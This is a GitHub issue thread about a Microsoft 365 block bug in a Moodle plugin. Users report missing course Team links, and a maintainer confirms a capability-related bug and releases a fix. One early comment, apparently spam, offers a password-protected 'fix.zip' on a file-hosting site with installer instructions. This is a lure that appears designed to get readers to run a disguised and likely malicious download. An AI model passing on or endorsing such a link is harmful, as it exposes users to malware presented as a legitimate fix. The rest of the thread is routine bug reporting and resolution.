### ISSUE TITLE
Some users not able to see Microsoft Block course Team connections

### ISSUE THREAD

**Issue by RedPenEL** [microsoft/o365-moodle#2625] opened 2024-08-28 10:22 UTC
Hi,
We recently updated to v4.3.6 via v4.1 from v3.11 and have come across a strange issue, in that some teachers cannot see the course Team links in the bottom part of the Microsoft Block while others can see it okay. That is, they will see the “XXX you are currently connected to Microsoft 365” message in the Block but not “The course is connected to a Team” message nor the links underneath that (Team, Outlook conversations, OneDrive files, Outlook calendar, Class notebook).

This happens even when the o365 group and associated Team have been created as expected. I’ve checked permissions in the group and Team and they are as expected (Teacher is ‘Owner’ and ‘Member’ in both). 

I’ve cross-checked the permissions and licenses of the users who cannot see the course against those who can and they are identical. 

I’ve checked all of the o365 plugins and they are those stated as compatible with Moodle v4.3. 

Not sure if related but there are a few errors in the coursesyc log related to 3 deleted O365 groups not being accessible. When I disable Team creation for these courses in the ‘Customize course sync”, they keep getting re-enabled after every coursesync task runs. 
All other logs look fine.

The only other aspect of the upgrade was that we recently switched teachers from the old ‘Office 365 A1 for faculty' licenses to ‘Microsoft A3 for faculty’. But as the issue only affects some teachers, I’m not sure how relevant this is.

Any suggestions would be greatly appreciated.
Pat

**Comment by LC-JiaZhaorong** [comment] 2024-08-28 10:24
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Tehnari** [comment] 2024-08-29 18:28
I can confirm the same errors with Moodle 4.4.2+ (Build: 20240823) | Version 2024042202.03 and Microsoft 365 Integration 2024042200. 
Administrators and Teachers in Microsoft block don't see Microsoft 365 Teams connection link.
Other strange things:
We don't have The Microsoft School Data Sync ("SDS"), but have at university Office 365 A1.  Strange is errors for "no owner" when task trying to create course or teams/group, but there are teachers, and permissions were verified. 
Updating manually existing relation for course with teams, result with error: "NOTE: Manually connect a Moodle course with a Team created by Student Data Sync (SDS) may result in unexpected behaviour in both Moodle course sync and SDS sync, therefore should be prohibited."

**Comment by weilai-irl** [comment] 2024-09-30 16:07
Hi @RedPenEL 

I acknowledge the issue, and I confirm it's caused by a bug in the logic to determine the contents to show in the course section in the Microsoft block. It would affect users with "local/o365:teamowner" capability in the course context.

The fix to the bug has been provided in the linked PRs, and will be included in the next release after test.

Regards,
Lai

**Comment by weilai-irl** [comment] 2024-10-18 09:02
Hi @RedPenEL 

The fix to the issue has been included in the release from yesterday. Please check it out.

Thank you for reporting the issue to us.

Regards,
Lai

**Closed by weilai-irl** 2024-10-18 09:02 UTC
Labels: Issue type - bug, Status - PR ready / pending release, Plugin - block_microsoft

**Comment by RedPenEL** [comment] 2024-10-18 09:04
Many thanks for this @weilai-irl , I have been testing from a few days ago and works great.
Regards
RP
